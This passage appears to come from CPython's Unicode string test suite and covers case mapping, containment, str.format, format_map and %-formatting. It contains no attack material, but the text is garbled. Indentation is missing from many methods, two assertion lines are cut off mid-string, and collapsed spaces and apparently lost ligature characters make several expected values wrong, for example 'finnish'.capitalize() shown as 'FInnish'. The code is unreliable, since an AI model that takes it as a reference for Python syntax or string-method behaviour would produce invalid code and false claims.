        self.assertEqual('\u03a3\u0345 '.lower(), '\u03c3\u0345 ')
        # unassigned non-BMP codepoint and small Roman numeral are unchanged
        self.assertEqual('\U0008fffe'.lower(), '\U0008fffe')
        self.assertEqual('\u2177'.lower(), '\u2177')
def test_casefold(self):
self.assertEqual('hello'.casefold(), 'hello')
self.assertEqual('hELlo'.casefold(), 'hello')
self.assertEqual('ß'.casefold(), 'ss')
self.assertEqual('fi'.casefold(), 'fi')
self.assertEqual('\u03a3'.casefold(), '\u03c3')
self.assertEqual('A\u0345\u03a3'.casefold(), 'a\u03b9\u03c3')
self.assertEqual('\u00b5'.casefold(), '\u03bc')
    def test_upper(self):
        """str.upper: non-BMP mappings and expanding special casing."""
        string_tests.CommonTest.test_upper(self)
        self.assertEqual('\U0001044F'.upper(), '\U00010427')
        self.assertEqual('\U0001044F\U0001044F'.upper(),
                         '\U00010427\U00010427')
        self.assertEqual('\U00010427\U0001044F'.upper(),
                         '\U00010427\U00010427')
        self.assertEqual('X\U00010427x\U0001044F'.upper(),
                         'X\U00010427X\U00010427')
        self.assertEqual('fi'.upper(), 'FI')
        self.assertEqual('\u0130'.upper(), '\u0130')
        self.assertEqual('\u03a3'.upper(), '\u03a3')
        # one-to-many mappings: sharp s and iota with diacritics expand
        self.assertEqual('ß'.upper(), 'SS')
        self.assertEqual('\u1fd2'.upper(), '\u0399\u0308\u0300')
        # unassigned non-BMP codepoint is unchanged; small Roman numeral maps
        self.assertEqual('\U0008fffe'.upper(), '\U0008fffe')
        self.assertEqual('\u2177'.upper(), '\u2167')
    def test_capitalize(self):
        """str.capitalize: first char up, rest down, incl. non-BMP letters."""
        string_tests.CommonTest.test_capitalize(self)
        self.assertEqual('\U0001044F'.capitalize(), '\U00010427')
        self.assertEqual('\U0001044F\U0001044F'.capitalize(),
                         '\U00010427\U0001044F')
        self.assertEqual('\U00010427\U0001044F'.capitalize(),
                         '\U00010427\U0001044F')
        self.assertEqual('\U0001044F\U00010427'.capitalize(),
                         '\U00010427\U0001044F')
        self.assertEqual('X\U00010427x\U0001044F'.capitalize(),
                         'X\U0001044Fx\U0001044F')
        # U+0130 in non-initial position is lowercased to the two-char form
        self.assertEqual('h\u0130'.capitalize(), 'H\u0069\u0307')
        exp = '\u0399\u0308\u0300\u0069\u0307'
        self.assertEqual('\u1fd2\u0130'.capitalize(), exp)
        self.assertEqual('finnish'.capitalize(), 'FInnish')
        self.assertEqual('A\u0345\u03a3'.capitalize(), 'A\u0345\u03c2')
    def test_title(self):
        """str.title: word-wise capitalization, incl. non-BMP letters."""
        super().test_title()
        self.assertEqual('\U0001044F'.title(), '\U00010427')
        self.assertEqual('\U0001044F\U0001044F'.title(),
                         '\U00010427\U0001044F')
        self.assertEqual('\U0001044F\U0001044F \U0001044F\U0001044F'.title(),
                         '\U00010427\U0001044F \U00010427\U0001044F')
        self.assertEqual('\U00010427\U0001044F \U00010427\U0001044F'.title(),
                         '\U00010427\U0001044F \U00010427\U0001044F')
        self.assertEqual('\U0001044F\U00010427 \U0001044F\U00010427'.title(),
                         '\U00010427\U0001044F \U00010427\U0001044F')
        self.assertEqual('X\U00010427x\U0001044F X\U00010427x\U0001044F'.title(),
                         'X\U0001044Fx\U0001044F X\U0001044Fx\U0001044F')
        self.assertEqual('fiNNISH'.title(), 'Finnish')
        # final-sigma handling applies at the end of each word
        self.assertEqual('A\u03a3 \u1fa1xy'.title(), 'A\u03c2 \u1fa9xy')
        self.assertEqual('A\u03a3A'.title(), 'A\u03c3a')
    def test_swapcase(self):
        """str.swapcase: non-BMP mappings and Unicode special casing."""
        string_tests.CommonTest.test_swapcase(self)
        self.assertEqual('\U0001044F'.swapcase(), '\U00010427')
        self.assertEqual('\U00010427'.swapcase(), '\U0001044F')
        self.assertEqual('\U0001044F\U0001044F'.swapcase(),
                         '\U00010427\U00010427')
        self.assertEqual('\U00010427\U0001044F'.swapcase(),
                         '\U0001044F\U00010427')
        self.assertEqual('\U0001044F\U00010427'.swapcase(),
                         '\U00010427\U0001044F')
        self.assertEqual('X\U00010427x\U0001044F'.swapcase(),
                         'x\U0001044FX\U00010427')
        self.assertEqual('fi'.swapcase(), 'FI')
        # U+0130 swaps to the two-char lowercase form
        self.assertEqual('\u0130'.swapcase(), '\u0069\u0307')
        # Special case for GREEK CAPITAL LETTER SIGMA / final sigma
        self.assertEqual('\u03a3'.swapcase(), '\u03c3')
        self.assertEqual('\u0345\u03a3'.swapcase(), '\u0399\u03c3')
        self.assertEqual('A\u0345\u03a3'.swapcase(), 'a\u0399\u03c2')
        self.assertEqual('A\u0345\u03a3a'.swapcase(), 'a\u0399\u03c3A')
        self.assertEqual('A\u0345\u03a3'.swapcase(), 'a\u0399\u03c2')
        self.assertEqual('A\u03a3\u0345'.swapcase(), 'a\u03c2\u0399')
        self.assertEqual('\u03a3\u0345 '.swapcase(), '\u03c3\u0399 ')
        self.assertEqual('\u03a3'.swapcase(), '\u03c3')
        # expanding mapping: sharp s becomes SS
        self.assertEqual('ß'.swapcase(), 'SS')
        self.assertEqual('\u1fd2'.swapcase(), '\u0399\u0308\u0300')
def test_center(self):
string_tests.CommonTest.test_center(self)
self.assertEqual('x'.center(2, '\U0010FFFF'),
'x\U0010FFFF')
self.assertEqual('x'.center(3, '\U0010FFFF'),
'\U0010FFFFx\U0010FFFF')
self.assertEqual('x'.center(4, '\U0010FFFF'),
'\U0010FFFFx\U0010FFFF\U0010FFFF')
@unittest.skipUnless(sys.maxsize == 2**31 - 1, "requires 32-bit system")
@support.cpython_only
def test_case_operation_overflow(self):
size = 2**32//12 + 1
try:
s = "ü" * size
except MemoryError:
self.skipTest('no enough memory (%.0f MiB required)' % (size / 2**20))
try:
self.assertRaises(OverflowError, s.upper)
finally:
del s
def test_contains(self):
self.assertIn('a', 'abdb')
self.assertIn('a', 'bdab')
self.assertIn('a', 'bdaba')
self.assertIn('a', 'bdba')
self.assertNotIn('a', 'bdb')
self.assertIn('a', 'bdba')
self.assertIn('a', ('a',1,None))
self.assertIn('a', (1,None,'a'))
self.assertIn('a', ('a',1,None))
self.assertIn('a', (1,None,'a'))
self.assertNotIn('a', ('x',1,'y'))
self.assertNotIn('a', ('x',1,None))
self.assertNotIn('abcd', 'abcxxxx')
self.assertIn('ab', 'abcd')
self.assertIn('ab', 'abc')
self.assertIn('ab', (1,None,'ab'))
self.assertIn('', 'abc')
self.assertIn('', '')
self.assertIn('', 'abc')
self.assertNotIn('\0', 'abc')
self.assertIn('\0', '\0abc')
self.assertIn('\0', 'abc\0')
self.assertIn('a', '\0abc')
self.assertIn('asdf', 'asdf')
self.assertNotIn('asdf', 'asd')
self.assertNotIn('asdf', '')
self.assertRaises(TypeError, "abc".__contains__)
for fill in ('a', '\u0100', '\U00010300'):
fill *= 9
for delim in ('c', '\u0102', '\U00010302'):
self.assertNotIn(delim, fill)
self.assertIn(delim, fill + delim)
self.assertNotIn(delim * 2, fill)
self.assertIn(delim * 2, fill + delim * 2)
def test_issue18183(self):
'\U00010000\U00100000'.lower()
'\U00010000\U00100000'.casefold()
'\U00010000\U00100000'.upper()
'\U00010000\U00100000'.capitalize()
'\U00010000\U00100000'.title()
'\U00010000\U00100000'.swapcase()
'\U00100000'.center(3, '\U00010000')
'\U00100000'.ljust(3, '\U00010000')
'\U00100000'.rjust(3, '\U00010000')
def test_format(self):
self.assertEqual(''.format(), '')
self.assertEqual('a'.format(), 'a')
self.assertEqual('ab'.format(), 'ab')
self.assertEqual('a{{'.format(), 'a{')
self.assertEqual('a}}'.format(), 'a}')
self.assertEqual('{{b'.format(), '{b')
self.assertEqual('}}b'.format(), '}b')
self.assertEqual('a{{b'.format(), 'a{b')
import datetime
self.assertEqual("My name is {0}".format('Fred'), "My name is Fred")
self.assertEqual("My name is {0[name]}".format(dict(name='Fred')),
"My name is Fred")
self.assertEqual("My name is {0} :-{{}}".format('Fred'),
"My name is Fred :-{}")
d = datetime.date(2007, 8, 18)
self.assertEqual("The year is {0.year}".format(d),
"The year is 2007")
class C:
def __init__(self, x=100):
self._x = x
def __format__(self, spec):
return spec
class D:
def __init__(self, x):
self.x = x
def __format__(self, spec):
return str(self.x)
# class with __str__, but no __format__
class E:
def __init__(self, x):
self.x = x
def __str__(self):
return 'E(' + self.x + ')'
# class with __repr__, but no __format__ or __str__
class F:
def __init__(self, x):
self.x = x
def __repr__(self):
return 'F(' + self.x + ')'
# class with __format__ that forwards to string, for some format_spec's
class G:
def __init__(self, x):
self.x = x
def __str__(self):
return "string is " + self.x
def __format__(self, format_spec):
if format_spec == 'd':
return 'G(' + self.x + ')'
return object.__format__(self, format_spec)
class I(datetime.date):
def __format__(self, format_spec):
return self.strftime(format_spec)
class J(int):
def __format__(self, format_spec):
return int.__format__(self * 2, format_spec)
class M:
def __init__(self, x):
self.x = x
def __repr__(self):
return 'M(' + self.x + ')'
__str__ = None
class N:
def __init__(self, x):
self.x = x
def __repr__(self):
return 'N(' + self.x + ')'
__format__ = None
self.assertEqual(''.format(), '')
self.assertEqual('abc'.format(), 'abc')
self.assertEqual('{0}'.format('abc'), 'abc')
self.assertEqual('{0:}'.format('abc'), 'abc')
self.assertEqual('X{0}'.format('abc'), 'Xabc')
self.assertEqual('{0}X'.format('abc'), 'abcX')
self.assertEqual('X{0}Y'.format('abc'), 'XabcY')
self.assertEqual('{1}'.format(1, 'abc'), 'abc')
self.assertEqual('X{1}'.format(1, 'abc'), 'Xabc')
self.assertEqual('{1}X'.format(1, 'abc'), 'abcX')
self.assertEqual('X{1}Y'.format(1, 'abc'), 'XabcY')
self.assertEqual('{0}'.format(-15), '-15')
self.assertEqual('{0}{1}'.format(-15, 'abc'), '-15abc')
self.assertEqual('{0}X{1}'.format(-15, 'abc'), '-15Xabc')
self.assertEqual('{{'.format(), '{')
self.assertEqual('}}'.format(), '}')
self.assertEqual('{{}}'.format(), '{}')
self.assertEqual('{{x}}'.format(), '{x}')
self.assertEqual('{{{0}}}'.format(123), '{123}')
self.assertEqual('{{{{0}}}}'.format(), '{{0}}')
self.assertEqual('}}{{'.format(), '}{')
self.assertEqual('}}x{{'.format(), '}x{')
self.assertEqual("{0[foo-bar]}".format({'foo-bar':'baz'}), 'baz')
self.assertEqual("{0[foo bar]}".format({'foo bar':'baz'}), 'baz')
self.assertEqual("{0[ ]}".format({' ':3}), '3')
self.assertEqual('{foo._x}'.format(foo=C(20)), '20')
self.assertEqual('{1}{0}'.format(D(10), D(20)), '2010')
self.assertEqual('{0._x.x}'.format(C(D('abc'))), 'abc')
self.assertEqual('{0[0]}'.format(['abc', 'def']), 'abc')
self.assertEqual('{0[1]}'.format(['abc', 'def']), 'def')
self.assertEqual('{0[1][0]}'.format(['abc', ['def']]), 'def')
self.assertEqual('{0[1][0].x}'.format(['abc', [D('def')]]), 'def')
self.assertEqual('{0:.3s}'.format('abc'), 'abc')
self.assertEqual('{0:.3s}'.format('ab'), 'ab')
self.assertEqual('{0:.3s}'.format('abcdef'), 'abc')
self.assertEqual('{0:.0s}'.format('abcdef'), '')
self.assertEqual('{0:3.3s}'.format('abc'), 'abc')
self.assertEqual('{0:2.3s}'.format('abc'), 'abc')
self.assertEqual('{0:2.2s}'.format('abc'), 'ab')
self.assertEqual('{0:3.2s}'.format('abc'), 'ab ')
self.assertEqual('{0:x<0s}'.format('result'), 'result')
self.assertEqual('{0:x<5s}'.format('result'), 'result')
self.assertEqual('{0:x<6s}'.format('result'), 'result')
self.assertEqual('{0:x<7s}'.format('result'), 'resultx')
self.assertEqual('{0:x<8s}'.format('result'), 'resultxx')
self.assertEqual('{0: <7s}'.format('result'), 'result ')
self.assertEqual('{0:<7s}'.format('result'), 'result ')
self.assertEqual('{0:>7s}'.format('result'), ' result')
self.assertEqual('{0:>8s}'.format('result'), ' result')
self.assertEqual('{0:^8s}'.format('result'), ' result ')
self.assertEqual('{0:^9s}'.format('result'), ' result ')
self.assertEqual('{0:^10s}'.format('result'), ' result ')
self.assertEqual('{0:10000}'.format('a'), 'a' + ' ' * 9999)
self.assertEqual('{0:10000}'.format(''), ' ' * 10000)
self.assertEqual('{0:10000000}'.format(''), ' ' * 10000000)
self.assertEqual('{0:\x00<6s}'.format('foo'), 'foo\x00\x00\x00')
self.assertEqual('{0:\x01<6s}'.format('foo'), 'foo\x01\x01\x01')
self.assertEqual('{0:\x00^6s}'.format('foo'), '\x00foo\x00\x00')
self.assertEqual('{0:^6s}'.format('foo'), ' foo ')
self.assertEqual('{0:\x00<6}'.format(3), '3\x00\x00\x00\x00\x00')
self.assertEqual('{0:\x01<6}'.format(3), '3\x01\x01\x01\x01\x01')
self.assertEqual('{0:\x00^6}'.format(3), '\x00\x003\x00\x00\x00')
self.assertEqual('{0:<6}'.format(3), '3 ')
self.assertEqual('{0:\x00<6}'.format(3.14), '3.14\x00\x00')
self.assertEqual('{0:\x01<6}'.format(3.14), '3.14\x01\x01')
self.assertEqual('{0:\x00^6}'.format(3.14), '\x003.14\x00')
self.assertEqual('{0:^6}'.format(3.14), ' 3.14 ')
self.assertEqual('{0:\x00<12}'.format(3+2.0j), '(3+2j)\x00\x00\x00\x00\x00\x00')
self.assertEqual('{0:\x01<12}'.format(3+2.0j), '(3+2j)\x01\x01\x01\x01\x01\x01')
self.assertEqual('{0:\x00^12}'.format(3+2.0j), '\x00\x00\x00(3+2j)\x00\x00\x00')
self.assertEqual('{0:^12}'.format(3+2.0j), ' (3+2j) ')
self.assertEqual('{0:abc}'.format(C()), 'abc')
self.assertEqual('{0!s}'.format('Hello'), 'Hello')
self.assertEqual('{0!s:}'.format('Hello'), 'Hello')
self.assertEqual('{0!s:15}'.format('Hello'), 'Hello ')
self.assertEqual('{0!s:15s}'.format('Hello'), 'Hello ')
self.assertEqual('{0!r}'.format('Hello'), "'Hello'")
self.assertEqual('{0!r:}'.format('Hello'), "'Hello'")
self.assertEqual('{0!r}'.format(F('Hello')), 'F(Hello)')
self.assertEqual('{0!r}'.format('\u0378'), "'\\u0378'")
self.assertEqual('{0!r}'.format('\u0374'), "'\u0374'")
self.assertEqual('{0!r}'.format(F('\u0374')), 'F(\u0374)')
self.assertEqual('{0!a}'.format('Hello'), "'Hello'")
self.assertEqual('{0!a}'.format('\u0378'), "'\\u0378'")
self.assertEqual('{0!a}'.format('\u0374'), "'\\u0374'")
self.assertEqual('{0!a:}'.format('Hello'), "'Hello'")
self.assertEqual('{0!a}'.format(F('Hello')), 'F(Hello)')
self.assertEqual('{0!a}'.format(F('\u0374')), 'F(\\u0374)')
self.assertEqual('{0}'.format({}), '{}')
self.assertEqual('{0}'.format([]), '[]')
self.assertEqual('{0}'.format([1]), '[1]')
self.assertEqual('{0:d}'.format(G('data')), 'G(data)')
self.assertEqual('{0!s}'.format(G('data')), 'string is data')
self.assertRaises(TypeError, '{0:^10}'.format, E('data'))
self.assertRaises(TypeError, '{0:^10s}'.format, E('data'))
self.assertRaises(TypeError, '{0:>15s}'.format, G('data'))
self.assertEqual("{0:date: %Y-%m-%d}".format(I(year=2007,
month=8,
day=27)),
"date: 2007-08-27")
self.assertEqual("{0}".format(J(10)), "20")
self.assertEqual('{0:}'.format('a'), 'a')
self.assertEqual("{0:.{1}}".format('hello world', 5), 'hello')
self.assertEqual("{0:.{1}s}".format('hello world', 5), 'hello')
self.assertEqual("{0:.{precision}s}".format('hello world', precision=5), 'hello')
self.assertEqual("{0:{width}.{precision}s}".format('hello world', width=10, precision=5), 'hello ')
self.assertEqual("{0:{width}.{precision}s}".format('hello world', width='10', precision='5'), 'hello ')
self.assertRaises(ValueError, '{'.format)
self.assertRaises(ValueError, '}'.format)
self.assertRaises(ValueError, 'a{'.format)
self.assertRaises(ValueError, 'a}'.format)
self.assertRaises(ValueError, '{a'.format)
self.assertRaises(ValueError, '}a'.format)
self.assertRaises(IndexError, '{0}'.format)
self.assertRaises(IndexError, '{1}'.format, 'abc')
self.assertRaises(KeyError, '{x}'.format)
self.assertRaises(ValueError, "}{".format)
self.assertRaises(ValueError, "abc{0:{}".format)
self.assertRaises(ValueError, "{0".format)
self.assertRaises(IndexError, "{0.}".format)
self.assertRaises(ValueError, "{0.}".format, 0)
self.assertRaises(ValueError, "{0[}".format)
self.assertRaises(ValueError, "{0[}".format, [])
self.assertRaises(KeyError, "{0]}".format)
self.assertRaises(ValueError, "{0.[]}".format, 0)
self.assertRaises(ValueError, "{0..foo}".format, 0)
self.assertRaises(ValueError, "{0[0}".format, 0)
self.assertRaises(ValueError, "{0[0:foo}".format, 0)
self.assertRaises(KeyError, "{c]}".format)
self.assertRaises(ValueError, "{{ {{{0}}".format, 0)
self.assertRaises(ValueError, "{0}}".format, 0)
self.assertRaises(KeyError, "{foo}".format, bar=3)
self.assertRaises(ValueError, "{0!x}".format, 3)
self.assertRaises(ValueError, "{0!}".format, 0)
self.assertRaises(ValueError, "{0!rs}".format, 0)
self.assertRaises(ValueError, "{!}".format)
self.assertRaises(IndexError, "{:}".format)
self.assertRaises(IndexError, "{:s}".format)
self.assertRaises(IndexError, "{}".format)
big = "23098475029384702983476098230754973209482573"
self.assertRaises(ValueError, ("{" + big + "}").format)
self.assertRaises(ValueError, ("{[" + big + "]}").format, [0])
self.assertRaises(ValueError, "{0[0]x}".format, [None])
self.assertRaises(ValueError, "{0[0](10)}".format, [None])
self.assertRaises(TypeError, '{0[{1}]}'.format, 'abcdefg', 4)
# exceed maximum recursion depth
self.assertRaises(ValueError, "{0:{1:{2}}}".format, 'abc', 's', '')
self.assertRaises(ValueError, "{0:{1:{2:{3:{4:{5:{6}}}}}}}".format,
0, 1, 2, 3, 4, 5, 6, 7)
# string format spec errors
self.assertRaises(ValueError, "{0:-s}".format, '')
self.assertRaises(ValueError, format, "", "-")
self.assertRaises(ValueError, "{0:=s}".format, '')
# Alternate formatting is not supported
self.assertRaises(ValueError, format, '', '
self.assertRaises(ValueError, format, '', '
# Non-ASCII
self.assertEqual("{0:s}{1:s}".format("ABC", "\u0410\u0411\u0412"),
'ABC\u0410\u0411\u0412')
self.assertEqual("{0:.3s}".format("ABC\u0410\u0411\u0412"),
'ABC')
self.assertEqual("{0:.0s}".format("ABC\u0410\u0411\u0412"),
'')
self.assertEqual("{[{}]}".format({"{}": 5}), "5")
self.assertEqual("{[{}]}".format({"{}" : "a"}), "a")
self.assertEqual("{[{]}".format({"{" : "a"}), "a")
self.assertEqual("{[}]}".format({"}" : "a"}), "a")
self.assertEqual("{[[]}".format({"[" : "a"}), "a")
self.assertEqual("{[!]}".format({"!" : "a"}), "a")
self.assertRaises(ValueError, "{a{}b}".format, 42)
self.assertRaises(ValueError, "{a{b}".format, 42)
self.assertRaises(ValueError, "{[}".format, 42)
self.assertEqual("0x{:0{:d}X}".format(0x0,16), "0x0000000000000000")
# Blocking fallback
m = M('data')
self.assertEqual("{!r}".format(m), 'M(data)')
self.assertRaises(TypeError, "{!s}".format, m)
self.assertRaises(TypeError, "{}".format, m)
n = N('data')
self.assertEqual("{!r}".format(n), 'N(data)')
self.assertEqual("{!s}".format(n), 'N(data)')
self.assertRaises(TypeError, "{}".format, n)
def test_format_map(self):
self.assertEqual(''.format_map({}), '')
self.assertEqual('a'.format_map({}), 'a')
self.assertEqual('ab'.format_map({}), 'ab')
self.assertEqual('a{{'.format_map({}), 'a{')
self.assertEqual('a}}'.format_map({}), 'a}')
self.assertEqual('{{b'.format_map({}), '{b')
self.assertEqual('}}b'.format_map({}), '}b')
self.assertEqual('a{{b'.format_map({}), 'a{b')
# using mappings
class Mapping(dict):
def __missing__(self, key):
return key
self.assertEqual('{hello}'.format_map(Mapping()), 'hello')
self.assertEqual('{a} {world}'.format_map(Mapping(a='hello')), 'hello world')
class InternalMapping:
def __init__(self):
self.mapping = {'a': 'hello'}
def __getitem__(self, key):
return self.mapping[key]
self.assertEqual('{a}'.format_map(InternalMapping()), 'hello')
class C:
def __init__(self, x=100):
self._x = x
def __format__(self, spec):
return spec
self.assertEqual('{foo._x}'.format_map({'foo': C(20)}), '20')
# test various errors
self.assertRaises(TypeError, ''.format_map)
self.assertRaises(TypeError, 'a'.format_map)
self.assertRaises(ValueError, '{'.format_map, {})
self.assertRaises(ValueError, '}'.format_map, {})
self.assertRaises(ValueError, 'a{'.format_map, {})
self.assertRaises(ValueError, 'a}'.format_map, {})
self.assertRaises(ValueError, '{a'.format_map, {})
self.assertRaises(ValueError, '}a'.format_map, {})
# issue #12579: can't supply positional params to format_map
self.assertRaises(ValueError, '{}'.format_map, {'a' : 2})
self.assertRaises(ValueError, '{}'.format_map, 'a')
self.assertRaises(ValueError, '{a} {}'.format_map, {"a" : 2, "b" : 1})
def test_format_huge_precision(self):
format_string = ".{}f".format(sys.maxsize + 1)
with self.assertRaises(ValueError):
result = format(2.34, format_string)
def test_format_huge_width(self):
format_string = "{}f".format(sys.maxsize + 1)
with self.assertRaises(ValueError):
result = format(2.34, format_string)
def test_format_huge_item_number(self):
format_string = "{{{}:.6f}}".format(sys.maxsize + 1)
with self.assertRaises(ValueError):
result = format_string.format(2.34)
def test_format_auto_numbering(self):
class C:
def __init__(self, x=100):
self._x = x
def __format__(self, spec):
return spec
self.assertEqual('{}'.format(10), '10')
self.assertEqual('{:5}'.format('s'), 's ')
self.assertEqual('{!r}'.format('s'), "'s'")
self.assertEqual('{._x}'.format(C(10)), '10')
self.assertEqual('{[1]}'.format([1, 2]), '2')
self.assertEqual('{[a]}'.format({'a':4, 'b':2}), '4')
self.assertEqual('a{}b{}c'.format(0, 1), 'a0b1c')
self.assertEqual('a{:{}}b'.format('x', '^10'), 'a x b')
self.assertEqual('a{:{}x}b'.format(20, '#'), 'a0x14b')
self.assertRaises(ValueError, '{}{1}'.format, 1, 2)
self.assertRaises(ValueError, '{1}{}'.format, 1, 2)
self.assertRaises(ValueError, '{:{1}}'.format, 1, 2)
self.assertRaises(ValueError, '{0:{}}'.format, 1, 2)
# can mix and match auto-numbering and named
self.assertEqual('{f}{}'.format(4, f='test'), 'test4')
self.assertEqual('{}{f}'.format(4, f='test'), '4test')
self.assertEqual('{:{f}}{g}{}'.format(1, 3, g='g', f=2), ' 1g3')
self.assertEqual('{f:{}}{}{g}'.format(2, 4, f=1, g='g'), ' 14g')
    def test_formatting(self):
        """Exercise printf-style (%) formatting on str.

        Covers positional and mapping conversions, the %c/%r/%a
        conversions with non-BMP and non-ASCII data, star widths and
        precisions, NaN/inf rendering, and the integer-only behaviour of
        %x/%X/%o/%c (issue #19995).
        """
        string_tests.MixinStrUnicodeUserStringTest.test_formatting(self)
        # Testing Unicode formatting strings...
        self.assertEqual("%s, %s" % ("abc", "abc"), 'abc, abc')
        self.assertEqual("%s, %s, %i, %f, %5.2f" % ("abc", "abc", 1, 2, 3), 'abc, abc, 1, 2.000000, 3.00')
        self.assertEqual("%s, %s, %i, %f, %5.2f" % ("abc", "abc", 1, -2, 3), 'abc, abc, 1, -2.000000, 3.00')
        self.assertEqual("%s, %s, %i, %f, %5.2f" % ("abc", "abc", -1, -2, 3.5), 'abc, abc, -1, -2.000000, 3.50')
        self.assertEqual("%s, %s, %i, %f, %5.2f" % ("abc", "abc", -1, -2, 3.57), 'abc, abc, -1, -2.000000, 3.57')
        self.assertEqual("%s, %s, %i, %f, %5.2f" % ("abc", "abc", -1, -2, 1003.57), 'abc, abc, -1, -2.000000, 1003.57')
        if not sys.platform.startswith('java'):
            # %r shows bytes with the b'' prefix; %a ASCII-escapes.
            self.assertEqual("%r, %r" % (b"abc", "abc"), "b'abc', 'abc'")
            self.assertEqual("%r" % ("\u1234",), "'\u1234'")
            self.assertEqual("%a" % ("\u1234",), "'\\u1234'")
        self.assertEqual("%(x)s, %(y)s" % {'x':"abc", 'y':"def"}, 'abc, def')
        self.assertEqual("%(x)s, %(\xfc)s" % {'x':"abc", '\xfc':"def"}, 'abc, def')
        # %c accepts a code point (including non-BMP) or a one-char string.
        self.assertEqual('%c' % 0x1234, '\u1234')
        self.assertEqual('%c' % 0x21483, '\U00021483')
        self.assertRaises(OverflowError, "%c".__mod__, (0x110000,))
        self.assertEqual('%c' % '\U00021483', '\U00021483')
        self.assertRaises(TypeError, "%c".__mod__, "aa")
        self.assertRaises(ValueError, "%.1\u1032f".__mod__, (1.0/3))
        self.assertRaises(TypeError, "%i".__mod__, "aa")
        # formatting jobs delegated from the string implementation:
        self.assertEqual('...%(foo)s...' % {'foo':"abc"}, '...abc...')
        self.assertEqual('...%(foo)s...' % {'foo':"abc"}, '...abc...')
        self.assertEqual('...%(foo)s...' % {'foo':"abc"}, '...abc...')
        self.assertEqual('...%(foo)s...' % {'foo':"abc"}, '...abc...')
        self.assertEqual('...%(foo)s...' % {'foo':"abc",'def':123},  '...abc...')
        self.assertEqual('...%(foo)s...' % {'foo':"abc",'def':123}, '...abc...')
        self.assertEqual('...%s...%s...%s...%s...' % (1,2,3,"abc"), '...1...2...3...abc...')
        self.assertEqual('...%%...%%s...%s...%s...%s...%s...' % (1,2,3,"abc"), '...%...%s...1...2...3...abc...')
        self.assertEqual('...%s...' % "abc", '...abc...')
        # '*' takes width/precision from the argument tuple.
        self.assertEqual('%*s' % (5,'abc',), '  abc')
        self.assertEqual('%*s' % (-5,'abc',), 'abc  ')
        self.assertEqual('%*.*s' % (5,2,'abc',), '   ab')
        self.assertEqual('%*.*s' % (5,3,'abc',), '  abc')
        self.assertEqual('%i %*.*s' % (10, 5,3,'abc',), '10   abc')
        self.assertEqual('%i%s %*.*s' % (10, 3, 5, 3, 'abc',), '103   abc')
        self.assertEqual('%c' % 'a', 'a')
        # %s calls __str__ on arbitrary objects.
        class Wrapper:
            def __str__(self):
                return '\u1234'
        self.assertEqual('%s' % Wrapper(), '\u1234')
        # issue 3382
        NAN = float('nan')
        INF = float('inf')
        self.assertEqual('%f' % NAN, 'nan')
        self.assertEqual('%F' % NAN, 'NAN')
        self.assertEqual('%f' % INF, 'inf')
        self.assertEqual('%F' % INF, 'INF')
        # PEP 393
        self.assertEqual('%.1s' % "a\xe9\u20ac", 'a')
        self.assertEqual('%.2s' % "a\xe9\u20ac", 'a\xe9')
        #issue 19995
        class PseudoInt:
            def __init__(self, value):
                self.value = int(value)
            def __int__(self):
                return self.value
            def __index__(self):
                return self.value
        class PseudoFloat:
            # Has __int__ but no __index__, so it must be rejected by
            # the integer-only conversions below.
            def __init__(self, value):
                self.value = float(value)
            def __int__(self):
                return int(self.value)
        pi = PseudoFloat(3.1415)
        letter_m = PseudoInt(109)
        self.assertEqual('%x' % 42, '2a')
        self.assertEqual('%X' % 15, 'F')
        self.assertEqual('%o' % 9, '11')
        self.assertEqual('%c' % 109, 'm')
        self.assertEqual('%x' % letter_m, '6d')
        self.assertEqual('%X' % letter_m, '6D')
        self.assertEqual('%o' % letter_m, '155')
        self.assertEqual('%c' % letter_m, 'm')
        # Floats (and float-like objects) are not implicitly truncated.
        self.assertRaisesRegex(TypeError, '%x format: an integer is required, not float', operator.mod, '%x', 3.14),
        self.assertRaisesRegex(TypeError, '%X format: an integer is required, not float', operator.mod, '%X', 2.11),
        self.assertRaisesRegex(TypeError, '%o format: an integer is required, not float', operator.mod, '%o', 1.79),
        self.assertRaisesRegex(TypeError, '%x format: an integer is required, not PseudoFloat', operator.mod, '%x', pi),
        self.assertRaises(TypeError, operator.mod, '%c', pi),
    def test_formatting_with_enum(self):
        """%-formatting of enum members (issue #18780).

        %s uses the member's str() ('Str.ABC'), while numeric conversions
        (%d/%i/%u/%f) use the member's underlying value.
        """
        # issue18780
        import enum
        class Float(float, enum.Enum):
            PI = 3.1415926
        class Int(enum.IntEnum):
            IDES = 15
        class Str(str, enum.Enum):
            ABC = 'abc'
        # Testing Unicode formatting strings...
        self.assertEqual("%s, %s" % (Str.ABC, Str.ABC),
                         'Str.ABC, Str.ABC')
        self.assertEqual("%s, %s, %d, %i, %u, %f, %5.2f" %
                        (Str.ABC, Str.ABC,
                         Int.IDES, Int.IDES, Int.IDES,
                         Float.PI, Float.PI),
                         'Str.ABC, Str.ABC, 15, 15, 15, 3.141593, 3.14')
        # formatting jobs delegated from the string implementation:
        self.assertEqual('...%(foo)s...' % {'foo':Str.ABC},
                         '...Str.ABC...')
        self.assertEqual('...%(foo)s...' % {'foo':Int.IDES},
                         '...Int.IDES...')
        self.assertEqual('...%(foo)i...' % {'foo':Int.IDES},
                         '...15...')
        self.assertEqual('...%(foo)d...' % {'foo':Int.IDES},
                         '...15...')
        self.assertEqual('...%(foo)u...' % {'foo':Int.IDES, 'def':Float.PI},
                         '...15...')
        self.assertEqual('...%(foo)f...' % {'foo':Float.PI,'def':123},
                         '...3.141593...')
def test_formatting_huge_precision(self):
format_string = "%.{}f".format(sys.maxsize + 1)
with self.assertRaises(ValueError):
result = format_string % 2.34
def test_issue28598_strsubclass_rhs(self):
# A subclass of str with an __rmod__ method should be able to hook
# into the % operator
class SubclassedStr(str):
def __rmod__(self, other):
return 'Success, self.__rmod__({!r}) was called'.format(other)
self.assertEqual('lhs %% %r' % SubclassedStr('rhs'),
"Success, self.__rmod__('lhs %% %r') was called")
@support.cpython_only
def test_formatting_huge_precision_c_limits(self):
from _testcapi import INT_MAX
format_string = "%.{}f".format(INT_MAX + 1)
with self.assertRaises(ValueError):
result = format_string % 2.34
def test_formatting_huge_width(self):
format_string = "%{}f".format(sys.maxsize + 1)
with self.assertRaises(ValueError):
result = format_string % 2.34
def test_startswith_endswith_errors(self):
for meth in ('foo'.startswith, 'foo'.endswith):
with self.assertRaises(TypeError) as cm:
meth(['f'])
exc = str(cm.exception)
self.assertIn('str', exc)
self.assertIn('tuple', exc)
@support.run_with_locale('LC_ALL', 'de_DE', 'fr_FR')
def test_format_float(self):
# should not format with a comma, but always with C locale
self.assertEqual('1.0', '%.1f' % 1.0)
    def test_constructor(self):
